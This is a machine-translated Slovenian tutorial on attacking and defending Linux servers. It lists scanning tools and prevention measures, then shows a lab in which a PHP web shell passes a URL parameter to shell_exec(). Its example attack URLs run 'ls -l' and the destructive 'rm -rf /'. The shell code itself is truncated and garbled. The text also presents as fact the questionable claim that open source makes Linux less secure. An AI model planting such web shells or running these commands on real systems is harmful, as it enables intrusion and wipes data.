Linux je najpogosteje uporabljen strežniški operacijski sistem, zlasti za spletne strežnike. Je odprtokodna; to pomeni, da ima lahko vsakdo dostop do izvorne kode. Zaradi tega je manj varna v primerjavi z drugimi operacijskimi sistemi, saj lahko napadalci preučijo izvorno kodo, da bi našli ranljivosti . Linux za hekerje je namenjen izkoriščanju teh ranljivosti za nepooblaščen dostop do sistema.
V tem članku vam bomo predstavili, kaj je Linux, njegove varnostne ranljivosti, vdiranje z Ubuntujem in protiukrepe, ki jih lahko uvedete.
Teme v tej vadnici
- Hitra opomba o Linuxu
- Linux Hacking Tools
- Kako preprečiti vdore v Linux
- Dejavnost vdiranja: Vdrti v sistem Linux s pomočjo PHP
Hitra opomba o Linuxu
Linux je odprtokodni operacijski sistem . Obstaja veliko distribucij operacijskih sistemov, ki temeljijo na Linuxu, kot so Redhat, Fedora in Ubuntu itd. V nasprotju z drugimi operacijskimi sistemi je Linux pri varnosti manj varen. To je zato, ker je izvorna koda na voljo prosto, zato jo je enostavno preučiti glede ranljivosti in jo izkoristiti v primerjavi z drugimi operacijskimi sistemi, ki niso odprtokodni. Linux se lahko uporablja kot strežnik, namizje, tablični računalnik ali operacijski sistem mobilne naprave.
Programe Linux lahko upravljate s pomočjo GUI ali ukazov. Ukazi Linux za vdiranje Kali Linux so bolj učinkoviti in učinkoviti v primerjavi z uporabo GUI. Iz tega razloga pomaga poznati osnovne ukaze Linuxa za vdiranje.
Glejte te vadnice https://www.guru99.com/unix-linux-tutorial.html o tem, kako začeti uporabljati Kali Linux hacks.
Linux Hacking Tools
- Nessus - to orodje se lahko uporablja za kramp Ubuntuja, skeniranje konfiguracijskih nastavitev, popravke in omrežja itd. Najdemo ga na https://www.tenable.com/products/nessus
- NMap. To orodje se lahko uporablja za spremljanje gostiteljev, ki se izvajajo na strežniku, in storitev, ki jih uporabljajo. Uporablja se lahko tudi za iskanje vrat. Najdete jo na https://nmap.org/
- SARA - SARA je okrajšava za raziskovalec za varnostnega revizorja. Kot že ime pove, lahko to orodje uporabljamo za nadzor omrežij pred grožnjami, kot so SQL Injection, XSS itd. Najdemo ga na http://www-arc.com/sara/sara.html
Zgornji seznam ni izčrpen; daje vam predstavo o orodjih, ki so na voljo za vdiranje in vdiranje sistemov Linux v Ubuntu.
Kako preprečiti vdore v Linux
Linux Hacking izkorišča ranljivosti v operacijskem sistemu. Organizacija lahko sprejme naslednjo politiko, da se zaščiti pred takimi napadi.
- Upravljanje popravkov - popravki odpravljajo napake, ki jih napadalci izkoriščajo, da bi ogrozili sistem. Dobra politika upravljanja popravkov bo zagotovila, da boste v sistem nenehno uporabljali ustrezne popravke.
- Pravilna konfiguracija OS - drugi poskusi izkoriščajo slabosti v konfiguraciji strežnika. Neaktivna uporabniška imena in demoni bi morali biti onemogočeni. Spremeniti je treba privzete nastavitve, kot so skupna gesla za aplikacijo, privzeta uporabniška imena in nekatere številke vrat.
- Sistem za odkrivanje vdorov - takšna orodja je mogoče uporabiti za odkrivanje nepooblaščenega dostopa do sistema. Nekatera orodja lahko odkrijejo in preprečijo takšne napade.
Dejavnost vdiranja: Vdreti sistem Ubuntu Linux s pomočjo PHP
V tem praktičnem scenariju se bomo naučili, kako vdirati v Ubuntu, in dobili bomo osnovne informacije o tem, kako lahko PHP uporabite za ogrožanje Linuxa. Ne bomo tarča nobene žrtve. Če ga želite preizkusiti, lahko LAMPP namestite na vaš lokalni računalnik.
PHP ima dve funkciji, ki ju lahko uporabimo za izvajanje ukazov za hekerske sisteme Linux. Ima funkcije exec () in shell_exec (). Funkcija exec () vrne zadnjo vrstico izhoda ukaza, shell_exec () pa celoten rezultat ukaza kot niz.
Za predstavitvene namene predpostavimo, da upravitelji napadalcev naložijo naslednjo datoteko na spletni strežnik.
$cmd";$output = shell_exec($cmd);echo "$output";?>
TUKAJ,
Zgornji skript dobi ukaz iz spremenljivke GET z imenom cmd. Ukaz se izvede z uporabo shell_exec () in rezultati se vrnejo v brskalnik.
Zgornjo kodo lahko izkoristite z uporabo naslednjega URL-ja
http: //localhost/cp/konsole.php? cmd = ls% 20-l
TUKAJ,
- “… Konsole.php? Cmd = ls% 20-l” spremenljivki cmd dodeli vrednost ls -l .
Ukaz v Ubuntuju za vdor v strežnik se izvede kot
shell_exec('ls -l') ;
Izvedba zgornje kode na spletnem strežniku daje rezultate, podobne naslednjim.
Zgornji ukaz preprosto prikaže datoteke v trenutnem imeniku in dovoljenja
Predpostavimo, da napadalec prenese naslednji ukaz
rm -rf /
TUKAJ,
- “Rm” odstrani datoteke
- “Rf” omogoča, da se ukaz rm izvaja v rekurzivnem načinu. Brisanje vseh map in datotek
- “/” Naroči ukazu, naj začne brisati datoteke iz korenskega imenika
URL napada bi bil videti nekako tako
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Povzetek
- Linux je priljubljen operacijski sistem za strežnike, namizne računalnike, tablične računalnike in mobilne naprave.
- Linux je odprtokoden in izvorno kodo lahko dobi vsak. To olajša odkrivanje ranljivosti. Je eden najboljših OS za hekerje.
- Osnovni in mrežni ukazi za vdiranje v Ubuntu so dragoceni za hekerje Linuxa.
- Ranljivosti so šibkost, ki jo je mogoče izkoristiti za ogrožanje sistema.
- Dobra varnost lahko pomaga zaščititi sistem pred napadom napadalca.